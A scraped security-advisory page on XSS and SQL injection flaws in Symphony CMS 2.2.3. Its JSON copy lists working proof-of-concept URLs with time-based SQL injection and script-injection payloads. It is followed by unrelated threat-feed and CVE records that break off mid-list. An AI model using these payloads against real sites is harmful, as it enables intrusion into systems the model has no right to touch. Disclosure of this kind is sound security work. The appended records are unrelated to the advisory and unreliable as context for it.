XSS and SQL Injection Vulnerabilities on Symphony CMS 2.2.3
2011-11-06T00:00:00
ID SECURITYVULNS:DOC:27274 Type securityvulns Reporter Securityvulns Modified 2011-11-06T00:00:00
Description
Information
Name : XSS and SQL Injection Vulnerabilities on Symphony CMS
Software : Symphony CMS 2.2.3 and possibly below
Vendor Homepage : http://symphony-cms.com
Vulnerability Type : Cross-Site Scripting and SQL Injection
Severity : Critical
Researcher : Mesut Timur <mesut [at] mavitunasecurity [dot] com>
Advisory Reference : NS-11-008
Description
Symphony is a web-based content management system (CMS) that enables
users to create and manage websites and web applications of all shapes
and sizes—from the simplest of blogs to bustling news sites and
feature-packed social networks.
Details
Symphony is affected by several XSS and SQL Injection vulnerabilities.
Example PoC urls are as follows :
MSL Advisory :
http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-symphony-cms/
About Netsparker
Netsparker® can find and report security issues such as SQL Injection
and Cross-site Scripting (XSS) in all web applications regardless of
the platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allows it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
application security scanner.
{"id": "SECURITYVULNS:DOC:27274", "bulletinFamily": "software", "title": "XSS and SQL Injection Vulnerabilities on Symphony CMS 2.2.3", "description": "Information\r\n--------------------\r\nName : XSS and SQL Injection Vulnerabilities on Symphony CMS\r\nSoftware : Symphony CMS 2.2.3 and possibly below\r\nVendor Homepage : http://symphony-cms.com\r\nVulnerability Type : Cross-Site Scripting and SQL Injection\r\nSeverity : Critical\r\nResearcher : Mesut Timur <mesut [at] mavitunasecurity [dot] com>\r\nAdvisory Reference : NS-11-008\r\n\r\nDescription\r\n------------------\r\nSymphony is a web-based content management system (CMS) that enables\r\nusers to create and manage websites and web applications of all shapes\r\nand sizes\u2014from the simplest of blogs to bustling news sites and\r\nfeature-packed social networks.\r\n\r\nDetails\r\n-------------------\r\nSymphony is affected by several XSS and SQL Injection vulnerabilities.\r\nExample PoC urls are as follows :\r\n\r\n http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'\r\n http://example.com/symphony/publish/images/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'\r\n http://example.com/?profile='"--></style></script><script>alert(1)</script>\r\n http://example.com/symphony/publish/comments/?filter='"--></style></script><script>alert(1)</script>\r\n http://example.com/symphony/publish/images/?filter='"--></style></script><script>alert(1)</script>\r\n http://example.com/about/?profile='"--></style></script><script>alert(1)</script>\r\n http://example.com/drafts/?profile='"--></style></script><script>alert(1)</script>\r\n\r\n\r\nYou can read the full article about Cross-Site Scripting and SQL\r\nInjection vulnerabilities from here :\r\n\r\nhttp://www.mavitunasecurity.com/crosssite-scripting-xss/\r\nhttp://www.mavitunasecurity.com/sql-injection/\r\n\r\n\r\nSolution\r\n-------------------\r\nUpgrade to the latest Symphony version (2.2.4).\r\n\r\nCredits\r\n-------------------\r\nIt has been discovered on testing of Netsparker, Web Application\r\nSecurity Scanner - http://www.mavitunasecurity.com/netsparker/.\r\n\r\nReferences\r\n-------------------\r\n1. Vendor URL: http://symphony-cms.com/download/releases/version/2.2.4/\r\n2. Netsparker Advisories :\r\nhttp://www.mavitunasecurity.com/netsparker-advisories/\r\n3. MSL Advisory :\r\nhttp://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-symphony-cms/\r\n\r\nAbout Netsparker\r\n-------------------\r\nNetsparker\u00ae can find and report security issues such as SQL Injection\r\nand Cross-site Scripting (XSS) in all web applications regardless of\r\nthe platform and the technology they are built on. Netsparker's unique\r\ndetection and exploitation techniques allows it to be dead accurate in\r\nreporting hence it's the first and the only False Positive Free web\r\napplication security scanner.\r\n", "published": "2011-11-06T00:00:00", "modified": "2011-11-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27274", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 19, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:10:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2017-14603", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-27274"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:42", "rev": 2}, "vulnersScore": 5.0}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-02-14T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **27274[.]xc.05cg.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-02-14T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:4F660484-BE94-36FC-A6E3-C59B366E11BD", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 27274.xc.05cg.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-15T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 27274.xc.05cg.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-15T03:00:00, Last seen: 2021-02-15T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-15T00:00:00", "id": "RST:887A33B3-DB1B-3519-87AF-5C8F5E2F7163", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 27274.xc.05cg.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-15T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 www.27274.xc.05cg.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-15T03:00:00, Last seen: 2021-02-15T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-15T00:00:00", "id": "RST:DFC4A0AB-292B-3F66-AFCE-BDDD25FC13A4", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 www.27274.xc.05cg.com", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2021-02-04T14:27:47", "description": "Some parsing functions in the affected product do not check the return value of malloc and the thread handling the message is forced to close, which may lead to a denial-of-service condition on the OPC UA Tunneller (versions prior to 6.3.0.8233).", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-01-26T19:15:00", "title": "CVE-2020-27274", "type": "cve", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27274"], "modified": "2021-02-03T15:33:00", "cpe": [], "id": "CVE-2020-27274", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27274", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:36:36", "description": "In Asterisk 11.x before 11.25.3, 13.x before 13.17.2, and 14.x before 14.6.2 and Certified Asterisk 11.x before 11.6-cert18 and 13.x before 13.13-cert6, insufficient RTCP packet validation could allow reading stale buffer contents and when combined with the \"nat\" and \"symmetric_rtp\" options allow redirecting where Asterisk sends the next RTCP report.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-10T01:30:00", "title": "CVE-2017-14603", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14603"], "modified": "2017-11-05T23:03:00", "cpe": ["cpe:/a:digium:asterisk:13.12.1", "cpe:/a:digium:asterisk:14.5.0", "cpe:/a:digium:asterisk:11.17.1", "cpe:/a:digium:asterisk:13.13", "cpe:/a:digium:asterisk:11.22.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:11.16.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:13.3.0", "cpe:/a:digium:asterisk:11.14.0", "cpe:/a:digium:asterisk:13.10.0", "cpe:/a:digium:asterisk:13.13.0", "cpe:/a:digium:asterisk:11.20.0", "cpe:/a:digium:asterisk:11.12.1", "cpe:/a:digium:asterisk:11.25.0", "cpe:/a:digium:asterisk:11.15.0", "cpe:/a:digium:asterisk:14.3.1", "cpe:/a:digium:asterisk:13.0.1", "cpe:/a:digium:asterisk:13.0.2", "cpe:/a:digium:asterisk:13.13.1", "cpe:/a:digium:asterisk:13.2.1", "cpe:/a:digium:asterisk:11.21.2", "cpe:/a:digium:asterisk:14.1.1", "cpe:/a:digium:asterisk:13.0.0", "cpe:/a:digium:asterisk:11.10.2", "cpe:/a:digium:asterisk:11.12.0", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:13.2.0", "cpe:/a:digium:asterisk:13.14.0", "cpe:/a:digium:asterisk:13.3.2", "cpe:/a:digium:asterisk:11.15.1", "cpe:/a:digium:asterisk:13.1.0", "cpe:/a:digium:asterisk:11.10.1", "cpe:/a:digium:asterisk:14.1.0", "cpe:/a:digium:asterisk:13.8.1", "cpe:/a:digium:asterisk:11.9.0", "cpe:/a:digium:asterisk:11.13.1", "cpe:/a:digium:asterisk:13.14.1", "cpe:/a:digium:asterisk:11.6.1", "cpe:/a:digium:asterisk:11.21.0", "cpe:/a:digium:asterisk:11.7.0", "cpe:/a:digium:asterisk:11.24.0", "cpe:/a:digium:asterisk:14.3.0", "cpe:/a:digium:asterisk:14.02", "cpe:/a:digium:asterisk:11.14.1", "cpe:/a:digium:asterisk:13.4.0", "cpe:/a:digium:asterisk:13.17.0", "cpe:/a:digium:asterisk:11.10.0", "cpe:/a:digium:certified_asterisk:13.13", "cpe:/a:digium:asterisk:14.2.0", "cpe:/a:digium:asterisk:14.2.1", "cpe:/a:digium:asterisk:13.7.2", "cpe:/a:digium:asterisk:13.16.0", "cpe:/a:digium:asterisk:11.19.0", "cpe:/a:digium:asterisk:13.7.0", "cpe:/a:digium:asterisk:11.18.0", "cpe:/a:digium:asterisk:11.14.2", "cpe:/a:digium:asterisk:14.0.1", "cpe:/a:digium:asterisk:13.6.0", "cpe:/a:digium:asterisk:13.9.0", "cpe:/a:digium:asterisk:11.23.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.2.1", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:13.9.1", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:14.0.2", "cpe:/a:digium:asterisk:14.4.0", "cpe:/a:digium:asterisk:14.0.0", "cpe:/a:digium:asterisk:14.6.0", "cpe:/a:digium:asterisk:14.2", "cpe:/a:digium:asterisk:13.12", "cpe:/a:digium:asterisk:11.8.1", "cpe:/a:digium:asterisk:13.5.0", "cpe:/a:digium:asterisk:13.11.0", "cpe:/a:digium:asterisk:11.24.1", "cpe:/a:digium:asterisk:11.11.0", "cpe:/a:digium:asterisk:13.12.0", "cpe:/a:digium:asterisk:11.23.1", "cpe:/a:digium:asterisk:13.1.1", "cpe:/a:digium:asterisk:11.21.1", "cpe:/a:digium:asterisk:11.17.0", "cpe:/a:digium:asterisk:14.1", "cpe:/a:digium:asterisk:11.8.0", "cpe:/a:digium:asterisk:11.6.0", "cpe:/a:digium:asterisk:14.4.1", "cpe:/a:digium:asterisk:14.01", "cpe:/a:digium:asterisk:13.15.1", "cpe:/a:digium:asterisk:13.11.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:14.1.2", "cpe:/a:digium:asterisk:13.15.0", "cpe:/a:digium:asterisk:13.7.1", "cpe:/a:digium:asterisk:13.12.2", "cpe:/a:digium:asterisk:11.2.2", "cpe:/a:digium:asterisk:13.8.2", "cpe:/a:digium:asterisk:13.8.0", "cpe:/a:digium:asterisk:11.13.0", "cpe:/a:digium:certified_asterisk:11.6", "cpe:/a:digium:asterisk:11.25.1", "cpe:/a:digium:asterisk:14.0", "cpe:/a:digium:asterisk:13.11.2"], "id": "CVE-2017-14603", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14603", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.25.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*", "cpe:2.3:a:digium:asterisk:11.15.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.25.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:14.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:13.14.0:rc2:*:*:*:*:*:*", 